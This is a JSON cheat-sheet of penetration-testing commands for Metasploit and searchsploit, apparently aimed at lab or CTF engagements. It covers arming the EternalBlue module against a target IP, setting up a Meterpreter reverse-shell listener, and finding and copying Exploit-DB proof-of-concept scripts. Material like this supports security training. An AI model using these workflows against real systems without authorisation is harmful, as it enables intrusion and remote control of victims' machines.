[
  {
    "id": "msf-start",
    "tool": "Metasploit",
    "category": "Exploitation",
    "scenario_tags": ["exploitation", "framework"],
    "platform": "cross-platform",
    "title": "Start MSFConsole",
    "command": "msfconsole -q",
    "description": "Launches the Metasploit Framework command-line interface. The '-q' flag starts it in quiet mode, suppressing the large ASCII art banner for a faster, cleaner startup.",
    "when_to_use": "The starting point for using any Metasploit modules, whether you are generating payloads, catching reverse shells, or launching public exploits.",
    "example": "msfconsole -q"
  },
  {
    "id": "msf-search",
    "tool": "Metasploit",
    "category": "Exploitation",
    "scenario_tags": ["exploitation", "framework", "search"],
    "platform": "cross-platform",
    "title": "Search for Exploits",
    "command": "search <keyword> type:exploit",
    "description": "Queries the internal Metasploit database for modules matching your keyword, specifically filtering the results to only show 'exploit' modules (ignoring scanners or payloads).",
    "when_to_use": "When you have identified a specific service version (e.g., 'vsftpd 2.3.4' or 'eternalblue') and need to see if Metasploit has a pre-built exploit ready to use.",
    "example": "search vsftpd type:exploit"
  },
  {
    "id": "msf-use-module",
    "tool": "Metasploit",
    "category": "Exploitation",
    "scenario_tags": ["exploitation", "framework"],
    "platform": "cross-platform",
    "title": "Load and Configure a Module",
    "command": "use <module_path>\nshow options\nset RHOSTS <target_ip>\nset LHOST <tun0_ip>",
    "description": "The standard workflow for arming an exploit. You load the module, view its required configuration, and set the remote target (RHOSTS) and your local listening address (LHOST).",
    "when_to_use": "Every time you decide to launch a specific exploit or scanner within the framework.",
    "example": "use exploit/windows/smb/ms17_010_eternalblue\nset RHOSTS 10.10.10.40\nset LHOST tun0",
    "common_pitfalls": "Forgetting to set LHOST correctly (it often defaults to your eth0 interface, but during VPN engagements it must be set to tun0)."
  },
  {
    "id": "msf-multi-handler",
    "tool": "Metasploit",
    "category": "Exploitation",
    "scenario_tags": ["exploitation", "listener", "meterpreter"],
    "platform": "cross-platform",
    "title": "Setup a Generic Catching Listener",
    "command": "use exploit/multi/handler\nset PAYLOAD <payload_type>\nset LHOST <listening_ip>\nset LPORT <listening_port>\nexploit -j",
    "description": "Configures a universal listener designed to catch incoming reverse shells or Meterpreter sessions generated by payloads running outside of Metasploit. The '-j' flag runs it quietly in the background as a job.",
    "when_to_use": "Essential when you have uploaded a standalone payload (like an msfvenom executable or a web shell) to a target and need a robust way to catch the incoming connection.",
    "example": "use exploit/multi/handler\nset PAYLOAD windows/x64/meterpreter/reverse_tcp\nset LHOST tun0\nset LPORT 4444\nexploit -j"
  },
  {
    "id": "searchsploit-basic",
    "tool": "searchsploit",
    "category": "Exploitation",
    "scenario_tags": ["exploitation", "exploit-db", "offline-search"],
    "platform": "linux",
    "title": "Search Exploit-DB Offline",
    "command": "searchsploit <search_term>",
    "description": "Performs a fast, offline search through a local copy of the Exploit Database. It maps keywords to the exact path of the exploit code on your system.",
    "when_to_use": "Use this constantly during the vulnerability analysis phase to find manual Proof of Concept (PoC) scripts for the software versions you discovered during reconnaissance.",
    "example": "searchsploit WordPress 5.8",
    "related_ids": ["searchsploit-mirror"]
  },
  {
    "id": "searchsploit-mirror",
    "tool": "searchsploit",
    "category": "Exploitation",
    "scenario_tags": ["exploitation", "exploit-db"],
    "platform": "linux",
    "title": "Mirror Exploit Code to Current Directory",
    "command": "searchsploit -m <exploit_id>",
    "description": "Copies the specified exploit script from its deeply nested installation directory into your current working directory, so you can safely modify and execute it without altering the master copy.",
    "when_to_use": "Once searchsploit reveals a promising exploit script, you MUST run this command to grab a copy of it before attempting to compile or edit the code for your specific target.",
    "example": "searchsploit -m 49876",
    "common_pitfalls": "Running or compiling exploit code directly in the /usr/share/exploitdb folder requires root and pollutes the database path. Always mirror first."
  }
]
